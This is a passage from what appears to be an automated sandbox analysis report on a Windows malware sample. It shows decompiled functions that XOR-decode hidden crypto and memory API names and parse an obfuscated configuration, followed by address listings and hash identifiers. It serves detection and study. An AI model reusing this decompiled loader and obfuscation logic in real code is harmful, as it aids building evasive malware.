                                                                                                                                                                                                                                					E736D82C0("Advapi32.dll",  &_v115, _t760);
                                                                                                                                                                                                                                					_t813 = _t813 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v99 = 0;
                                                                                                                                                                                                                                				_v95 = 0x7c8eb3f4;
                                                                                                                                                                                                                                				_v91 = 0x2fcbbec5;
                                                                                                                                                                                                                                				_v87 = 0x7194b39b;
                                                                                                                                                                                                                                				_v83 = 0x1df8d7b5;
                                                                                                                                                                                                                                				if(_v99 == 0) {
                                                                                                                                                                                                                                					_t766 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t813 + 0x1fc + _t766 * 4) =  *(_t813 + 0x1fc + _t766 * 4) ^ 0x1df8d7b5;
                                                                                                                                                                                                                                						_t766 = _t766 + 1;
                                                                                                                                                                                                                                					} while (_t766 < 4);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_v55 = 0;
                                                                                                                                                                                                                                				_v51 = 0x7a18ab6f;
                                                                                                                                                                                                                                				_v47 = 0x66048b58;
                                                                                                                                                                                                                                				_v43 = 0x6f12b849;
                                                                                                                                                                                                                                				_v39 = 0x7e0fb66f;
                                                                                                                                                                                                                                				_v35 = 0xa15a149;
                                                                                                                                                                                                                                				if(_v55 == 0) {
                                                                                                                                                                                                                                					_t765 = 0;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						 *(_t813 + 0x228 + _t765 * 4) =  *(_t813 + 0x228 + _t765 * 4) ^ 0x0a61d92c;
                                                                                                                                                                                                                                						_t765 = _t765 + 1;
                                                                                                                                                                                                                                					} while (_t765 < 5);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E736D7DE0(_t795, "CryptReleaseContext", 0, 0x200);
                                                                                                                                                                                                                                				_t761 = 0;
                                                                                                                                                                                                                                				 *0x736f1980 = 0;
                                                                                                                                                                                                                                				_t814 = _t813 + 0xc;
                                                                                                                                                                                                                                				_t584 =  &_v51;
                                                                                                                                                                                                                                				if(_v51 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t584 = _t584 + 1;
                                                                                                                                                                                                                                						_t761 = _t761 + 1;
                                                                                                                                                                                                                                					} while ( *_t584 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t762 = _t761 + 1;
                                                                                                                                                                                                                                				if(_t761 + 1 != 0) {
                                                                                                                                                                                                                                					E736D82C0("CryptReleaseContext",  &_v51, _t762);
                                                                                                                                                                                                                                					_t814 = _t814 + 0xc;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t763 = 0;
                                                                                                                                                                                                                                				_t585 =  &_v95;
                                                                                                                                                                                                                                				if(_v95 != 0) {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t585 = _t585 + 1;
                                                                                                                                                                                                                                						_t763 = _t763 + 1;
                                                                                                                                                                                                                                					} while ( *_t585 != 0);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t764 = _t763 + 1;
                                                                                                                                                                                                                                				if(_t763 + 1 != 0) {
                                                                                                                                                                                                                                					return E736D82C0("Advapi32.dll",  &_v95, _t764);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t585;
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                0x736d49b0
                                                                                                                                                                                                                                0x736d49b0
                                                                                                                                                                                                                                0x736d49b3
                                                                                                                                                                                                                                0x736d49b4
                                                                                                                                                                                                                                0x736d49b0
                                                                                                                                                                                                                                0x736d49b9
                                                                                                                                                                                                                                0x736d49bc
                                                                                                                                                                                                                                0x736d49c9
                                                                                                                                                                                                                                0x736d49ce
                                                                                                                                                                                                                                0x736d49ce
                                                                                                                                                                                                                                0x736d49d1
                                                                                                                                                                                                                                0x736d49d9
                                                                                                                                                                                                                                0x736d49e4
                                                                                                                                                                                                                                0x736d49ef
                                                                                                                                                                                                                                0x736d49fa
                                                                                                                                                                                                                                0x736d4a14
                                                                                                                                                                                                                                0x736d4a16
                                                                                                                                                                                                                                0x736d4a20
                                                                                                                                                                                                                                0x736d4a2c
                                                                                                                                                                                                                                0x736d4a33
                                                                                                                                                                                                                                0x736d4a34
                                                                                                                                                                                                                                0x736d4a20
                                                                                                                                                                                                                                0x736d4a39
                                                                                                                                                                                                                                0x736d4a3e
                                                                                                                                                                                                                                0x736d4a49
                                                                                                                                                                                                                                0x736d4a54
                                                                                                                                                                                                                                0x736d4a5f
                                                                                                                                                                                                                                0x736d4a76
                                                                                                                                                                                                                                0x736d4a78
                                                                                                                                                                                                                                0x736d4a7a
                                                                                                                                                                                                                                0x736d4a80
                                                                                                                                                                                                                                0x736d4a8c
                                                                                                                                                                                                                                0x736d4a93
                                                                                                                                                                                                                                0x736d4a94
                                                                                                                                                                                                                                0x736d4a80
                                                                                                                                                                                                                                0x736d4aa5
                                                                                                                                                                                                                                0x736d4aaa
                                                                                                                                                                                                                                0x736d4aac
                                                                                                                                                                                                                                0x736d4ab6
                                                                                                                                                                                                                                0x736d4ab9
                                                                                                                                                                                                                                0x736d4ac7
                                                                                                                                                                                                                                0x736d4ad0
                                                                                                                                                                                                                                0x736d4ad0
                                                                                                                                                                                                                                0x736d4ad3
                                                                                                                                                                                                                                0x736d4ad4
                                                                                                                                                                                                                                0x736d4ad0
                                                                                                                                                                                                                                0x736d4ad9
                                                                                                                                                                                                                                0x736d4adc
                                                                                                                                                                                                                                0x736d4aec
                                                                                                                                                                                                                                0x736d4af1
                                                                                                                                                                                                                                0x736d4af1
                                                                                                                                                                                                                                0x736d4af4
                                                                                                                                                                                                                                0x736d4af6
                                                                                                                                                                                                                                0x736d4b04
                                                                                                                                                                                                                                0x736d4b06
                                                                                                                                                                                                                                0x736d4b06
                                                                                                                                                                                                                                0x736d4b09
                                                                                                                                                                                                                                0x736d4b0a
                                                                                                                                                                                                                                0x736d4b06
                                                                                                                                                                                                                                0x736d4b0f
                                                                                                                                                                                                                                0x736d4b12
                                                                                                                                                                                                                                0x736d4b22
                                                                                                                                                                                                                                0x736d4b27
                                                                                                                                                                                                                                0x736d4b27
                                                                                                                                                                                                                                0x736d4b2a
                                                                                                                                                                                                                                0x736d4b32
                                                                                                                                                                                                                                0x736d4b3d
                                                                                                                                                                                                                                0x736d4b48
                                                                                                                                                                                                                                0x736d4b53
                                                                                                                                                                                                                                0x736d4b6d
                                                                                                                                                                                                                                0x736d4b6f
                                                                                                                                                                                                                                0x736d4b71
                                                                                                                                                                                                                                0x736d4b7d
                                                                                                                                                                                                                                0x736d4b84
                                                                                                                                                                                                                                0x736d4b85
                                                                                                                                                                                                                                0x736d4b71
                                                                                                                                                                                                                                0x736d4b8a
                                                                                                                                                                                                                                0x736d4b92
                                                                                                                                                                                                                                0x736d4b9d
                                                                                                                                                                                                                                0x736d4ba8
                                                                                                                                                                                                                                0x736d4bb3
                                                                                                                                                                                                                                0x736d4bcd
                                                                                                                                                                                                                                0x736d4bcf
                                                                                                                                                                                                                                0x736d4bd1
                                                                                                                                                                                                                                0x736d4bdd
                                                                                                                                                                                                                                0x736d4be4
                                                                                                                                                                                                                                0x736d4be5
                                                                                                                                                                                                                                0x736d4bd1
                                                                                                                                                                                                                                0x736d4bf6
                                                                                                                                                                                                                                0x736d4bfb
                                                                                                                                                                                                                                0x736d4bfd
                                                                                                                                                                                                                                0x736d4c07
                                                                                                                                                                                                                                0x736d4c0a
                                                                                                                                                                                                                                0x736d4c18
                                                                                                                                                                                                                                0x736d4c1a
                                                                                                                                                                                                                                0x736d4c20
                                                                                                                                                                                                                                0x736d4c20
                                                                                                                                                                                                                                0x736d4c23
                                                                                                                                                                                                                                0x736d4c24
                                                                                                                                                                                                                                0x736d4c20
                                                                                                                                                                                                                                0x736d4c29
                                                                                                                                                                                                                                0x736d4c2c
                                                                                                                                                                                                                                0x736d4c3c
                                                                                                                                                                                                                                0x736d4c41
                                                                                                                                                                                                                                0x736d4c41
                                                                                                                                                                                                                                0x736d4c44
                                                                                                                                                                                                                                0x736d4c46
                                                                                                                                                                                                                                0x736d4c54
                                                                                                                                                                                                                                0x736d4c56
                                                                                                                                                                                                                                0x736d4c56
                                                                                                                                                                                                                                0x736d4c59
                                                                                                                                                                                                                                0x736d4c5a
                                                                                                                                                                                                                                0x736d4c56
                                                                                                                                                                                                                                0x736d4c5f
                                                                                                                                                                                                                                0x736d4c62
                                                                                                                                                                                                                                0x736d4c72
                                                                                                                                                                                                                                0x736d4c77
                                                                                                                                                                                                                                0x736d4c77
                                                                                                                                                                                                                                0x736d4c7a
                                                                                                                                                                                                                                0x736d5024
                                                                                                                                                                                                                                0x736d5027
                                                                                                                                                                                                                                0x736d502f
                                                                                                                                                                                                                                0x736d503a
                                                                                                                                                                                                                                0x736d5045
                                                                                                                                                                                                                                0x736d5050
                                                                                                                                                                                                                                0x736d506a
                                                                                                                                                                                                                                0x736d506c
                                                                                                                                                                                                                                0x736d5070
                                                                                                                                                                                                                                0x736d507c
                                                                                                                                                                                                                                0x736d5083
                                                                                                                                                                                                                                0x736d5084
                                                                                                                                                                                                                                0x736d5070
                                                                                                                                                                                                                                0x736d5089
                                                                                                                                                                                                                                0x736d508e
                                                                                                                                                                                                                                0x736d5096
                                                                                                                                                                                                                                0x736d509e
                                                                                                                                                                                                                                0x736d50af
                                                                                                                                                                                                                                0x736d50b1
                                                                                                                                                                                                                                0x736d50b3
                                                                                                                                                                                                                                0x736d50bc
                                                                                                                                                                                                                                0x736d50c0
                                                                                                                                                                                                                                0x736d50c1
                                                                                                                                                                                                                                0x736d50b3
                                                                                                                                                                                                                                0x736d50d2
                                                                                                                                                                                                                                0x736d50d7
                                                                                                                                                                                                                                0x736d50d9
                                                                                                                                                                                                                                0x736d50e3
                                                                                                                                                                                                                                0x736d50e6
                                                                                                                                                                                                                                0x736d50ee
                                                                                                                                                                                                                                0x736d50f0
                                                                                                                                                                                                                                0x736d50f0
                                                                                                                                                                                                                                0x736d50f3
                                                                                                                                                                                                                                0x736d50f4
                                                                                                                                                                                                                                0x736d50f0
                                                                                                                                                                                                                                0x736d50f9
                                                                                                                                                                                                                                0x736d50fc
                                                                                                                                                                                                                                0x736d5109
                                                                                                                                                                                                                                0x736d510e
                                                                                                                                                                                                                                0x736d510e
                                                                                                                                                                                                                                0x736d5111
                                                                                                                                                                                                                                0x736d5113
                                                                                                                                                                                                                                0x736d5121
                                                                                                                                                                                                                                0x736d5123
                                                                                                                                                                                                                                0x736d5123
                                                                                                                                                                                                                                0x736d5126
                                                                                                                                                                                                                                0x736d5127
                                                                                                                                                                                                                                0x736d5123
                                                                                                                                                                                                                                0x736d512c
                                                                                                                                                                                                                                0x736d512f
                                                                                                                                                                                                                                0x736d513f
                                                                                                                                                                                                                                0x736d5144
                                                                                                                                                                                                                                0x736d5144
                                                                                                                                                                                                                                0x736d5147
                                                                                                                                                                                                                                0x736d514f
                                                                                                                                                                                                                                0x736d515a
                                                                                                                                                                                                                                0x736d5165
                                                                                                                                                                                                                                0x736d5170
                                                                                                                                                                                                                                0x736d518a
                                                                                                                                                                                                                                0x736d518c
                                                                                                                                                                                                                                0x736d5190
                                                                                                                                                                                                                                0x736d519c
                                                                                                                                                                                                                                0x736d51a3
                                                                                                                                                                                                                                0x736d51a4
                                                                                                                                                                                                                                0x736d5190
                                                                                                                                                                                                                                0x736d51a9
                                                                                                                                                                                                                                0x736d51ae
                                                                                                                                                                                                                                0x736d51b6
                                                                                                                                                                                                                                0x736d51be
                                                                                                                                                                                                                                0x736d51cf
                                                                                                                                                                                                                                0x736d51d1
                                                                                                                                                                                                                                0x736d51d3
                                                                                                                                                                                                                                0x736d51dc
                                                                                                                                                                                                                                0x736d51e0
                                                                                                                                                                                                                                0x736d51e1
                                                                                                                                                                                                                                0x736d51d3
                                                                                                                                                                                                                                0x736d51f2
                                                                                                                                                                                                                                0x736d51f7
                                                                                                                                                                                                                                0x736d51f9
                                                                                                                                                                                                                                0x736d5203
                                                                                                                                                                                                                                0x736d5206
                                                                                                                                                                                                                                0x736d520e
                                                                                                                                                                                                                                0x736d5210
                                                                                                                                                                                                                                0x736d5210
                                                                                                                                                                                                                                0x736d5213
                                                                                                                                                                                                                                0x736d5214
                                                                                                                                                                                                                                0x736d5210
                                                                                                                                                                                                                                0x736d5219
                                                                                                                                                                                                                                0x736d521c
                                                                                                                                                                                                                                0x736d5229
                                                                                                                                                                                                                                0x736d522e
                                                                                                                                                                                                                                0x736d522e
                                                                                                                                                                                                                                0x736d5231
                                                                                                                                                                                                                                0x736d5233
                                                                                                                                                                                                                                0x736d5241
                                                                                                                                                                                                                                0x736d5243
                                                                                                                                                                                                                                0x736d5243
                                                                                                                                                                                                                                0x736d5246
                                                                                                                                                                                                                                0x736d5247
                                                                                                                                                                                                                                0x736d5243
                                                                                                                                                                                                                                0x736d524c
                                                                                                                                                                                                                                0x736d524f
                                                                                                                                                                                                                                0x736d525f
                                                                                                                                                                                                                                0x736d5264
                                                                                                                                                                                                                                0x736d5264
                                                                                                                                                                                                                                0x736d5267
                                                                                                                                                                                                                                0x736d526f
                                                                                                                                                                                                                                0x736d527a
                                                                                                                                                                                                                                0x736d5285
                                                                                                                                                                                                                                0x736d5290
                                                                                                                                                                                                                                0x736d52aa
                                                                                                                                                                                                                                0x736d52ac
                                                                                                                                                                                                                                0x736d52b0
                                                                                                                                                                                                                                0x736d52bc
                                                                                                                                                                                                                                0x736d52c3
                                                                                                                                                                                                                                0x736d52c4
                                                                                                                                                                                                                                0x736d52b0
                                                                                                                                                                                                                                0x736d52c9
                                                                                                                                                                                                                                0x736d52ce
                                                                                                                                                                                                                                0x736d5691
                                                                                                                                                                                                                                0x736d569d
                                                                                                                                                                                                                                0x736d56a4
                                                                                                                                                                                                                                0x736d56a5
                                                                                                                                                                                                                                0x736d5691
                                                                                                                                                                                                                                0x736d56aa
                                                                                                                                                                                                                                0x736d56b2
                                                                                                                                                                                                                                0x736d56bd
                                                                                                                                                                                                                                0x736d56c8
                                                                                                                                                                                                                                0x736d56d3
                                                                                                                                                                                                                                0x736d56de
                                                                                                                                                                                                                                0x736d56f8
                                                                                                                                                                                                                                0x736d56fa
                                                                                                                                                                                                                                0x736d5700
                                                                                                                                                                                                                                0x736d570c
                                                                                                                                                                                                                                0x736d5713
                                                                                                                                                                                                                                0x736d5714
                                                                                                                                                                                                                                0x736d5700
                                                                                                                                                                                                                                0x736d5725
                                                                                                                                                                                                                                0x736d572a
                                                                                                                                                                                                                                0x736d572c
                                                                                                                                                                                                                                0x736d5736
                                                                                                                                                                                                                                0x736d5739
                                                                                                                                                                                                                                0x736d5747
                                                                                                                                                                                                                                0x736d5750
                                                                                                                                                                                                                                0x736d5750
                                                                                                                                                                                                                                0x736d5753
                                                                                                                                                                                                                                0x736d5754
                                                                                                                                                                                                                                0x736d5750
                                                                                                                                                                                                                                0x736d5759
                                                                                                                                                                                                                                0x736d575c
                                                                                                                                                                                                                                0x736d576c
                                                                                                                                                                                                                                0x736d5771
                                                                                                                                                                                                                                0x736d5771
                                                                                                                                                                                                                                0x736d5774
                                                                                                                                                                                                                                0x736d5776
                                                                                                                                                                                                                                0x736d5784
                                                                                                                                                                                                                                0x736d5786
                                                                                                                                                                                                                                0x736d5786
                                                                                                                                                                                                                                0x736d5789
                                                                                                                                                                                                                                0x736d578a
                                                                                                                                                                                                                                0x736d5786
                                                                                                                                                                                                                                0x736d578f
                                                                                                                                                                                                                                0x736d5792
                                                                                                                                                                                                                                0x736d57a2
                                                                                                                                                                                                                                0x736d57a7
                                                                                                                                                                                                                                0x736d57a7
                                                                                                                                                                                                                                0x736d57aa
                                                                                                                                                                                                                                0x736d57b2
                                                                                                                                                                                                                                0x736d57bd
                                                                                                                                                                                                                                0x736d57c8
                                                                                                                                                                                                                                0x736d57d3
                                                                                                                                                                                                                                0x736d57ed
                                                                                                                                                                                                                                0x736d57ef
                                                                                                                                                                                                                                0x736d57f1
                                                                                                                                                                                                                                0x736d57fd
                                                                                                                                                                                                                                0x736d5804
                                                                                                                                                                                                                                0x736d5805
                                                                                                                                                                                                                                0x736d57f1
                                                                                                                                                                                                                                0x736d580a
                                                                                                                                                                                                                                0x736d5812
                                                                                                                                                                                                                                0x736d581d
                                                                                                                                                                                                                                0x736d5828
                                                                                                                                                                                                                                0x736d5833
                                                                                                                                                                                                                                0x736d584d
                                                                                                                                                                                                                                0x736d584f
                                                                                                                                                                                                                                0x736d5851
                                                                                                                                                                                                                                0x736d585d
                                                                                                                                                                                                                                0x736d5864
                                                                                                                                                                                                                                0x736d5865
                                                                                                                                                                                                                                0x736d5851
                                                                                                                                                                                                                                0x736d5876
                                                                                                                                                                                                                                0x736d587b
                                                                                                                                                                                                                                0x736d587d
                                                                                                                                                                                                                                0x736d5887
                                                                                                                                                                                                                                0x736d588a
                                                                                                                                                                                                                                0x736d5898
                                                                                                                                                                                                                                0x736d589a
                                                                                                                                                                                                                                0x736d58a0
                                                                                                                                                                                                                                0x736d58a0
                                                                                                                                                                                                                                0x736d58a3
                                                                                                                                                                                                                                0x736d58a4
                                                                                                                                                                                                                                0x736d58a0
                                                                                                                                                                                                                                0x736d58a9
                                                                                                                                                                                                                                0x736d58ac
                                                                                                                                                                                                                                0x736d58bc
                                                                                                                                                                                                                                0x736d58c1
                                                                                                                                                                                                                                0x736d58c1
                                                                                                                                                                                                                                0x736d58c4
                                                                                                                                                                                                                                0x736d58c6
                                                                                                                                                                                                                                0x736d58d4
                                                                                                                                                                                                                                0x736d58d6
                                                                                                                                                                                                                                0x736d58d6
                                                                                                                                                                                                                                0x736d58d9
                                                                                                                                                                                                                                0x736d58da
                                                                                                                                                                                                                                0x736d58d6
                                                                                                                                                                                                                                0x736d58df
                                                                                                                                                                                                                                0x736d58e2
                                                                                                                                                                                                                                0x736d58f2
                                                                                                                                                                                                                                0x736d58f7
                                                                                                                                                                                                                                0x736d58f7
                                                                                                                                                                                                                                0x736d58fa
                                                                                                                                                                                                                                0x736d5902
                                                                                                                                                                                                                                0x736d590d
                                                                                                                                                                                                                                0x736d5918
                                                                                                                                                                                                                                0x736d5923
                                                                                                                                                                                                                                0x736d593d
                                                                                                                                                                                                                                0x736d593f
                                                                                                                                                                                                                                0x736d5941
                                                                                                                                                                                                                                0x736d594d
                                                                                                                                                                                                                                0x736d5954
                                                                                                                                                                                                                                0x736d5955
                                                                                                                                                                                                                                0x736d5941
                                                                                                                                                                                                                                0x736d595a
                                                                                                                                                                                                                                0x736d5962
                                                                                                                                                                                                                                0x736d596d
                                                                                                                                                                                                                                0x736d5978
                                                                                                                                                                                                                                0x736d5983
                                                                                                                                                                                                                                0x736d599d

Strings
Memory Dump Source
• Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
• Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
• Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: OxtHeapAlloc$ UxtHeapReAlloc$$yH$7\o8$9GGL$<fS$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$B]~$B^`"$CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptImportKey$CryptReleaseContext$CryptSetKeyParam$GetProcessHeap$HeapFree$HeapSize$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$Km2$VirtualAlloc$VirtualFree$VirtualProtect$`gxtVirtualQuery$n/v$d/{$e"
• API String ID: 0-1114865788
• Opcode ID: b1867be9ba9068be2a02cea528abb8ca60eb543e65ab2cb222bcc7d43beec237
• Instruction ID: dff6162171c6db202aef98dc28c957c8103220349e120961216718a366527a9a
• Opcode Fuzzy Hash: b1867be9ba9068be2a02cea528abb8ca60eb543e65ab2cb222bcc7d43beec237
• Instruction Fuzzy Hash: C3A2B3B051C3C49FE726DF14D585BEBBBE4AB82308F59086DD1CB8A6D2E73194488B47
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 96%
E00A8235B(int* __ecx) {
	int _v8;
	void* _v12;
	void* _v16;
	void* __esi;
	signed int _t28;
	signed int _t33;
	signed int _t39;
	char* _t45;
	char* _t46;
	char* _t47;
	char* _t48;
	char* _t49;
	char* _t50;
	void* _t51;
	void* _t52;
	void* _t53;
	intOrPtr _t54;
	void* _t56;
	intOrPtr _t57;
	intOrPtr _t58;
	signed int _t61;
	intOrPtr _t64;
	signed int _t65;
	signed int _t70;
	void* _t72;
	void* _t73;
	signed int _t75;
	signed int _t78;
	signed int _t82;
	signed int _t86;
	signed int _t90;
	signed int _t94;
	signed int _t98;
	void* _t103;
	intOrPtr _t121;

	_t104 = __ecx;
                                                                                                                                                                                                                                				_t28 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                				if(E00A8A43F( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                                                                                                                                                                                                					 *0xa8d310 = _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t33 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                				if(E00A8A43F( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                                                                                                                                                                                                					_v12 = 2;
                                                                                                                                                                                                                                					L69:
                                                                                                                                                                                                                                					return _v12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t39 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                				if(E00A8A43F( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                                                                                                                                                                                                					L67:
                                                                                                                                                                                                                                					HeapFree( *0xa8d270, 0, _v16);
                                                                                                                                                                                                                                					goto L69;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t103 = _v12;
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t45 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t98 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t45 = E00A8A7ED(_t104, _t103, _t98 ^ 0x7895433b);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t45 != 0) {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                							 *0xa8d278 = _v8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t46 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t94 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t46 = E00A8A7ED(_t104, _t103, _t94 ^ 0x219b08c7);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t46 != 0) {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                							 *0xa8d27c = _v8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t47 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t90 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t47 = E00A8A7ED(_t104, _t103, _t90 ^ 0x31fc0661);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t47 != 0) {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                							 *0xa8d280 = _v8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t48 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t86 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t48 = E00A8A7ED(_t104, _t103, _t86 ^ 0x0cd926ce);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t48 != 0) {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                							 *0xa8d004 = _v8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t49 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t82 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t49 = E00A8A7ED(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t49 != 0) {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                                                                                                                                                                                                							 *0xa8d02c = _v8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t103 == 0) {
                                                                                                                                                                                                                                						_t50 = 0;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t78 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                						_t50 = E00A8A7ED(_t104, _t103, _t78 ^ 0x2878b929);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					if(_t50 == 0) {
                                                                                                                                                                                                                                						L41:
                                                                                                                                                                                                                                						 *0xa8d284 = 5;
                                                                                                                                                                                                                                						goto L42;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t104 =  &_v8;
                                                                                                                                                                                                                                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                                                                                                                                                                                                							goto L41;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							L42:
                                                                                                                                                                                                                                							if(_t103 == 0) {
                                                                                                                                                                                                                                								_t51 = 0;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t75 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                								_t51 = E00A8A7ED(_t104, _t103, _t75 ^ 0x261a367a);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(_t51 != 0) {
                                                                                                                                                                                                                                								_push(_t51);
                                                                                                                                                                                                                                								_t72 = 0x10;
                                                                                                                                                                                                                                								_t73 = E00A81685(_t72);
                                                                                                                                                                                                                                								if(_t73 != 0) {
                                                                                                                                                                                                                                									_push(_t73);
                                                                                                                                                                                                                                									E00A87095();
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(_t103 == 0) {
                                                                                                                                                                                                                                								_t52 = 0;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t70 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                								_t52 = E00A8A7ED(_t104, _t103, _t70 ^ 0xb9d404b2);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(_t52 != 0 && E00A81685(0, _t52) != 0) {
                                                                                                                                                                                                                                								_t121 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                								E00A845CF(_t121 + 4, _t68);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(_t103 == 0) {
                                                                                                                                                                                                                                								_t53 = 0;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t65 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                								_t53 = E00A8A7ED(_t104, _t103, _t65 ^ 0x3df17130);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							if(_t53 == 0) {
                                                                                                                                                                                                                                								L59:
                                                                                                                                                                                                                                								_t54 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                								_t22 = _t54 + 0xa8e252; // 0x616d692f
                                                                                                                                                                                                                                								 *0xa8d30c = _t22;
                                                                                                                                                                                                                                								goto L60;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t64 = E00A81685(0, _t53);
                                                                                                                                                                                                                                								 *0xa8d30c = _t64;
                                                                                                                                                                                                                                								if(_t64 != 0) {
                                                                                                                                                                                                                                									L60:
                                                                                                                                                                                                                                									if(_t103 == 0) {
                                                                                                                                                                                                                                										_t56 = 0;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t61 =  *0xa8d2dc; // 0x69b25f44
                                                                                                                                                                                                                                										_t56 = E00A8A7ED(_t104, _t103, _t61 ^ 0xd2079859);
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									if(_t56 == 0) {
                                                                                                                                                                                                                                										_t57 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                										_t23 = _t57 + 0xa8e79a; // 0x6976612e
                                                                                                                                                                                                                                										_t58 = _t23;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t58 = E00A81685(0, _t56);
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									 *0xa8d380 = _t58;
